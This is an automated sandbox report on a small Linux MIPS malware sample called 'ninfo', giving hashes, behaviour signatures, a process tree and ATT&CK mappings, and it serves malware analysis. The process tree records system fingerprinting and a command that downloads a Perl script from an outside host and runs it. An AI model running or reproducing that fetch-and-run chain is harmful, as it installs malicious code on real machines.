Analysis

  • max time kernel
    0s
  • max time network
    153s
  • platform
    linux_mipsel
  • resource
    debian9-mipsel-en-20211208
  • resource tags
    arch:mipsel
    image:debian9-mipsel-en-20211208
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mipsel
    system
  • submitted
    09-08-2022 09:21

General

  • Target

    ninfo

  • Size

    2KB

  • MD5

    ecf1fb8301600bf837437e21d17272b1

  • SHA1

    f554f8c16f5beea7ce09348ee1117a8ec6ad9fe2

  • SHA256

    f0f0c3f43e8537cb43cb932959534f038ec6ee9405aab2303d7da4d0cb34fb00

  • SHA512

    c0f7c727c165c61a925b1695c3c0c93d42158831447d915b730dd24370d24b33baa8cf88bf77d581a1c13568414206df09734374ca65c932941ecee4ac69de69

Score
9/10

Malware Config

Signatures

  • Attempts to identify hypervisor via CPU configuration 1 TTPs 4 IoCs

    Checks CPU information for indicators that the system is a virtual machine.

  • Modifies hosts file 1 IoCs

    Adds to hosts file used for mapping hosts to IP addresses.

  • Writes DNS configuration 1 TTPs 1 IoCs

    Writes data to DNS resolver config file.

  • Reads CPU attributes 1 TTPs 1 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 49 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 12 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ninfo
    /tmp/ninfo
    1⤵
    • Writes file to tmp directory
    PID:325
    • /bin/grep
      grep -c "^processor" /proc/cpuinfo
      2⤵
      • Attempts to identify hypervisor via CPU configuration
      PID:335
    • /bin/uname
      uname -a
      2⤵
      PID:351
    • /usr/bin/tput
      tput bold
      2⤵
      PID:353
    • /bin/sleep
      sleep 1
      2⤵
      PID:362
    • /bin/sleep
      sleep 1
      2⤵
      PID:363
    • /bin/sleep
      sleep 2
      2⤵
      PID:364
    • /bin/sleep
      sleep 2
      2⤵
      PID:365
    • /usr/bin/id
      id -u
      2⤵
      • Reads runtime system information
      PID:366
    • /bin/sleep
      sleep 3
      2⤵
      PID:367
    • /bin/sleep
      sleep 1
      2⤵
      PID:368
    • /bin/sleep
      sleep 1
      2⤵
      PID:369
    • /bin/sleep
      sleep 1
      2⤵
      PID:370
    • /bin/sleep
      sleep 1
      2⤵
      PID:371
    • /usr/bin/wget
      wget nasapaul.com/v.py
      2⤵
      • Modifies hosts file
      • Writes DNS configuration
      PID:372
    • /usr/bin/perl
      perl v.py
      2⤵
      PID:373
  • /usr/bin/cut
    cut -d: -f2
    1⤵
    PID:329
  • /bin/grep
    grep -m 1 "model name" /proc/cpuinfo
    1⤵
    • Attempts to identify hypervisor via CPU configuration
    PID:328
  • /bin/sed
    sed -e "s/^ *//"
    1⤵
    • Reads runtime system information
    PID:330
  • /bin/sed
    sed -e "s/\$//"
    1⤵
    • Reads runtime system information
    PID:331
  • /bin/grep
    grep -m 1 stepping /proc/cpuinfo
    1⤵
    • Attempts to identify hypervisor via CPU configuration
    PID:337
  • /usr/bin/cut
    cut -d: -f2
    1⤵
    PID:338
  • /bin/sed
    sed -e "s/^ *//"
    1⤵
    • Reads runtime system information
    PID:339
  • /bin/sed
    sed -e "s/\$//"
    1⤵
    • Reads runtime system information
    PID:340
  • /bin/grep
    grep -m 1 bogomips /proc/cpuinfo
    1⤵
    • Attempts to identify hypervisor via CPU configuration
    PID:342
  • /usr/bin/cut
    cut -d: -f2
    1⤵
    PID:343
  • /bin/sed
    sed -e "s/^ *//"
    1⤵
    • Reads runtime system information
    PID:344
  • /bin/sed
    sed -e "s/\$//"
    1⤵
    • Reads runtime system information
    PID:345
  • /bin/grep
    grep -oP "\\d+"
    1⤵
    PID:349
  • /usr/bin/free
    free -m
    1⤵
    • Reads CPU attributes
    • Reads runtime system information
    PID:348
  • /usr/bin/head
    head -n 1
    1⤵
    PID:350
  • /bin/grep
    grep VGA
    1⤵
    PID:356
  • /usr/bin/lspci
    lspci
    1⤵
    • Enumerates kernel/hardware configuration
    PID:355
  • /usr/bin/cut
    cut -f5- -d " "
    1⤵
    PID:357
  • /bin/df
    df -h --total
    1⤵
    • Reads runtime system information
    PID:359
  • /bin/grep
    grep total
    1⤵
    PID:360
  • /usr/bin/awk
    awk "{ printf \"\" \$2 \"B\\n\\n\" }"
    1⤵
    PID:361

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Defense Evasion
    T1497 Virtualization/Sandbox Evasion (1)
  • Discovery
    T1497 Virtualization/Sandbox Evasion (1)
    T1082 System Information Discovery (2)
  • Command and Control
    T1568 Dynamic Resolution (1)
